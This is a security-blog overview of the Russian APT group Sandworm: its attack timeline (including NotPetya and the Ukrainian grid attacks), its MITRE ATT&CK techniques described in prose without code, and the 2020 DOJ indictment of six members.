Malware analysis

APT Sandworm (NotPetya) technical overview

Pedro Tavares
April 7, 2021 by
Pedro Tavares

Sandworm, also known as Telebots, is one of the most dangerous Russian threat actors impacting industrial control systems. They use a tool called BlackEnergy and are associated with electricity and power generation for espionage, denial of service and data destruction purposes. This group is attributed to Russia’s Main Intelligence Directorate (GRU) and has conducted several attacks against thousands of U.S. and international corporations, organizations, political campaigns and governments.

Across the world, Sandworm has enacted new tactics, techniques and procedures (TTPs) to take advantage of a target’s weakness. Sandworm is a threat group active since 2009, with some researchers suggesting the group was also involved in attacks against Georgia in 2008.

Timeline of Sandworm cyberattacks

The attacks employed in Sandworm’s campaigns are often destructive, and the most notable are listed below:

  • In December 2015 and December 2016, the Sandworm group executed cyberattacks against companies that support electric infrastructures, disrupting the supply of electricity to more than 225,000 Ukrainian customers.
  • In 2017, Sandworm performed spearphishing waves that targeted local government, political parties and campaigns in France, including campaigns related to French President Emmanuel Macron’s presidential campaign.
  • In 2017 a notable malware campaign was launched — NotPetya — causing hundreds of victim organizations worldwide to lose $1 billion collectively. Petya and NotPetya are different malware variants, use different keys for encryption and have unique reboot styles, displays and notes. However, both are equally destructive.
  • Sandworm launched attacks against the 2018 Winter Olympics after a Russian government-sponsored doping effort led to Russian athletes being unable to participate under the Russian flag.
  • In October 2019, Sandworm defaced approximately 15,000 websites in Georgia.
  • More recently in 2020, Sandworm has been exploiting a critical Exim flaw (CVE-2019-10149) to compromise Exim mail servers. According to NSA, “The actors exploited victims using Exim software on their public-facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (simple mail transfer protocol) message.”

Overview of the Sandworm TTPs

The threat group has used several techniques to compromise a large volume of targets in recent years. In this section, we will focus on the main TTPs used by the Sandworm group, divided into several groups according to the MITRE ATT&CK mapping.

T1566: Phishing

Spearphishing campaigns were used by the Sandworm group to gain access to computers or account credentials. The emails were specially crafted to seem familiar and trusted. The threat group developed and tested all the spearphishing techniques before carrying out their campaigns to increase their success chances.

Source: https://attack.mitre.org/techniques/T1566/

 

T1059: Command and scripting interpreter

The threat group used PowerShell commands and specially crafted scripts to discover system information, execute code or download malware. According to some researchers, “In one instance, the group executed a malicious PowerShell script that contained versions of a credential harvesting tool. The tool operated only in memory and was not easily detectable by antivirus software.”

Source: https://attack.mitre.org/techniques/T1059/

 

T1078: Valid accounts

Sandworm used legitimate existing accounts to maintain its foothold on the infrastructure. The group also deployed malware and took advantage of hacking tools to maintain control over networks and victims’ devices. This TTP was also used to exfiltrate data, including confidential documents, tools and more.

Source: https://attack.mitre.org/techniques/T1059/

 

T1070: Indicator removal on host

Sandworm used an algorithm to obfuscate particular features of the Olympic Destroyer malware to obstruct attack investigations and avoid detection.

Source: https://attack.mitre.org/techniques/T1070/

 

T1036: Masquerading

Sandworm tried to masquerade their activity through researching and emulating malware used by the Lazarus Group.

Source: https://attack.mitre.org/techniques/T1036/

 

T1003: OS credential dumping

Sandworm often dumped credentials to obtain account login and credential details from compromised machines.

Source: https://attack.mitre.org/techniques/T1003/

 

T1083: File and directory discovery

Sandworm accessed and browsed files, ran malicious scripts and searched compromised machines for credential files and files containing network configuration details.

Source: https://attack.mitre.org/techniques/T1083/

 

T1210: Exploitation of remote services

Sandworm exploited remote services to access internal systems. When the access was completed, they deployed malware that was leveraged to obtain system privileges and execute or implant other stages.

Source: https://attack.mitre.org/techniques/T1210/

 

T1491: Defacement

Sandworm defaced approximately 1,500 websites and disrupted service to some of those websites following the Georgian web hosting provider’s compromise.

Source: https://attack.mitre.org/techniques/T1491/

 

T1490: Inhibit system recovery

The malicious group deployed destructive malware to delete files from hard drives, force shutdowns and impede rebooting and recovery by misconfiguring BitLocker, rendering computers inoperable.

Source: https://attack.mitre.org/techniques/T1490/

DOJ charges six Sandworm APT members

During the years investigating Sandworm, the DOJ charged six Russian nationals for their alleged part in the NotPetya, Ukraine power grid and Olympics cyberattacks in a note that was published in October 2020. The list of the six defendants is presented below.

(source)

The threat group is in charge of several high-profile cyberattacks over the past few years — including the destructive NotPetya cyberattack that targeted hundreds of firms and hospitals worldwide.

Each person was in charge of performing several malicious acts as mentioned in the official publication and also resumed in the table above. The defendants and their co-conspirators caused large damage and disruption to computer networks worldwide, including in France, Georgia, the Netherlands, the Republic of Korea, Ukraine, the United Kingdom and the United States.

Become a certified reverse engineer!

Become a certified reverse engineer!

Get live, hands-on malware analysis training from anywhere, and become a Certified Reverse Engineering Analyst.

Hooking Sandworm

This ongoing investigation is seen as an important step to defeating this malicious group. Several threat researchers applauded the DOJ crackdown and said the arrest and extraction of the six Russian nationals could limit their ability to use the western financial system or travel to any country that may have an extradition agreement with the U.S.

Google’s Threat Analysis Group (TAG), Cisco’s Talos Intelligence Group, Facebook and Twitter were also credited with helping the DOJ with this investigation. The power of sharing information was a crucial piece to spotlight and identify the defendants and their devastating attacks, including the NotPetya cyber incident that impacted many Internet end users and organizations around the world.

 

Sources

Exim flaw, NSA

Russian APTs, IronNet

SandWorm analysis. DigitalShadows

DOJ charges 6 Sandworm APT members, DOJ

Pedro Tavares
Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and a Security Evangelist. He is also Editor-in-Chief of the security computer blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.